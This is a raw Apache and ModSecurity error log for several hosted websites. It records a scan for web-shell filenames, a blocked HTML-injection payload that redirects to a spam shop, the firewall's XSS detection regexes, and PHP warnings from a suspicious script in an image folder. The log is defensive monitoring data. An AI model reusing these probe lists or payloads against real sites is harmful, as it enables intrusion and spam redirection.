[Tue May 12 06:22:40.878702 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/pol.php
[Tue May 12 06:22:40.973802 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/ms-amdin.php
[Tue May 12 06:22:41.069014 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/mini-type0.php
[Tue May 12 06:22:41.164677 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/bypasbnget.php
[Tue May 12 06:22:41.271474 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/sf.php
[Tue May 12 06:22:41.366624 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/file5.php
[Tue May 12 06:22:41.465791 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/fs.php
[Tue May 12 06:22:41.561131 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/4PJcpMFsD8B.php
[Tue May 12 06:22:41.656432 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/file.php
[Tue May 12 06:22:41.756825 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/class.1.php
[Tue May 12 06:22:41.852464 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/wp-gr.php
[Tue May 12 06:22:41.947603 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/cfile.php
[Tue May 12 06:22:42.045054 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/class-wp.php
[Tue May 12 06:22:42.141149 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/ff2.php
[Tue May 12 06:22:42.236516 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/aa2.php
[Tue May 12 06:22:42.333433 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/133.php
[Tue May 12 06:22:42.428648 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/ccou.php
[Tue May 12 06:22:42.523731 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/login8.php
[Tue May 12 06:22:42.619398 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/3586 b64.php
[Tue May 12 06:22:42.715381 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/18299.php
[Tue May 12 06:22:42.810498 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/nx1.php
[Tue May 12 06:22:42.905566 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/Noname6.php
[Tue May 12 06:22:43.000644 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/tia.php
[Tue May 12 06:22:43.067655 2026] [security2:error] [pid 1844863:tid 1844871] [client 43.157.153.236:38690] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.homin.fr"] [uri "/fr/"] [unique_id "agKrE_aAnTZtx1_H_wzILwAAAUI"], referer: http://www.homin.fr
[Tue May 12 06:22:43.096929 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/coa.php
[Tue May 12 06:22:43.192638 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/dr.php
[Tue May 12 06:22:43.288284 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/let.php
[Tue May 12 06:22:43.415523 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/w12.php
[Tue May 12 06:22:43.520781 2026] [:error] [pid 1844863:tid 1844888] [client 52.138.31.126:59340] File does not exist: /var/www/html/chati.php
[Tue May 12 06:23:02.640363 2026] [security2:error] [pid 1820198:tid 1820202] [client 216.73.216.110:31918] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: -Base64 found within ARGS:path: //usr/share/doc/perl-MIME-Base64"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKrJs1tk6y7yBJLpJpHcQAAAII"]
[Tue May 12 06:23:02.640716 2026] [security2:error] [pid 1820198:tid 1820202] [client 216.73.216.110:31918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKrJs1tk6y7yBJLpJpHcQAAAII"]
[Tue May 12 06:23:02.725871 2026] [security2:error] [pid 1820198:tid 1820202] [client 216.73.216.110:31918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKrJs1tk6y7yBJLpJpHcQAAAII"]
[Tue May 12 06:23:03.884600 2026] [security2:error] [pid 1825179:tid 1825202] [client 119.28.122.202:53744] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "mail.piregwan-genesis.com"] [uri "/"] [unique_id "agKrJ9r1yOh9Tvizeziv0AAAAEQ"], referer: http://mail.piregwan-genesis.com
[Tue May 12 06:23:25.319491 2026] [ssl:error] [pid 1844863:tid 1844871] (EAI 2)Name or service not known: [client 18.206.241.178:52294] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 06:23:25.319532 2026] [ssl:error] [pid 1844863:tid 1844871] AH01941: stapling_renew_response: responder error
[Tue May 12 06:23:37.914601 2026] [security2:error] [pid 1808852:tid 1808877] [client 100.29.128.75:35152] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/socialvideosaver.com"] [unique_id "agKrSRfeipD4uoG21FpDYAAAABY"]
[Tue May 12 06:23:37.914983 2026] [security2:error] [pid 1808852:tid 1808877] [client 100.29.128.75:35152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/socialvideosaver.com"] [unique_id "agKrSRfeipD4uoG21FpDYAAAABY"]
[Tue May 12 06:23:37.915228 2026] [security2:error] [pid 1808852:tid 1808877] [client 100.29.128.75:35152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/socialvideosaver.com"] [unique_id "agKrSRfeipD4uoG21FpDYAAAABY"]
[Tue May 12 06:24:15.314041 2026] [security2:error] [pid 1825179:tid 1825210] [client 43.135.182.43:39852] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.domaine-de-janasse.com"] [uri "/"] [unique_id "agKrb9r1yOh9TvizeziwBwAAAEw"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704819/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704819/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704819/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704819/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704819/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704819/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:25:06.947781 2026] [security2:error] [pid 1825287:tid 1825311] [client 54.162.69.192:40022] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bestcamporn.com"] [unique_id "agKroggpmE1yW0glLdg-fQAAAMY"]
[Tue May 12 06:25:06.948140 2026] [security2:error] [pid 1825287:tid 1825311] [client 54.162.69.192:40022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bestcamporn.com"] [unique_id "agKroggpmE1yW0glLdg-fQAAAMY"]
[Tue May 12 06:25:06.948375 2026] [security2:error] [pid 1825287:tid 1825311] [client 54.162.69.192:40022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bestcamporn.com"] [unique_id "agKroggpmE1yW0glLdg-fQAAAMY"]
[Tue May 12 06:25:07.136082 2026] [security2:error] [pid 1825179:tid 1825207] [client 27.78.84.116:63147] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKro9r1yOh9TvizeziwNAAAAEk"]
[Tue May 12 06:25:07.136485 2026] [security2:error] [pid 1825179:tid 1825207] [client 27.78.84.116:63147] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKro9r1yOh9TvizeziwNAAAAEk"]
[Tue May 12 06:25:07.138325 2026] [security2:error] [pid 1825179:tid 1825207] [client 27.78.84.116:63147] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKro9r1yOh9TvizeziwNAAAAEk"]
[Tue May 12 06:25:07.139368 2026] [security2:error] [pid 1825179:tid 1825207] [client 27.78.84.116:63147] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKro9r1yOh9TvizeziwNAAAAEk"]
[Tue May 12 06:25:07.139552 2026] [security2:error] [pid 1825179:tid 1825207] [client 27.78.84.116:63147] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKro9r1yOh9TvizeziwNAAAAEk"]
[Tue May 12 06:25:07.139982 2026] [security2:error] [pid 1825179:tid 1825207] [client 27.78.84.116:63147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKro9r1yOh9TvizeziwNAAAAEk"]
[Tue May 12 06:25:07.140244 2026] [security2:error] [pid 1825179:tid 1825207] [client 27.78.84.116:63147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKro9r1yOh9TvizeziwNAAAAEk"]
[Tue May 12 06:25:08.852567 2026] [security2:error] [pid 1820198:tid 1820216] [client 27.78.84.116:63215] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>the most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpM1tk6y7yBJLpJpH1AAAAJA"]
[Tue May 12 06:25:08.853002 2026] [security2:error] [pid 1820198:tid 1820216] [client 27.78.84.116:63215] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=r..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpM1tk6y7yBJLpJpH1AAAAJA"]
[Tue May 12 06:25:08.853161 2026] [security2:error] [pid 1820198:tid 1820216] [client 27.78.84.116:63215] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>The most beautiful evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKrpM1tk6y7yBJLpJpH1AAAAJA"]
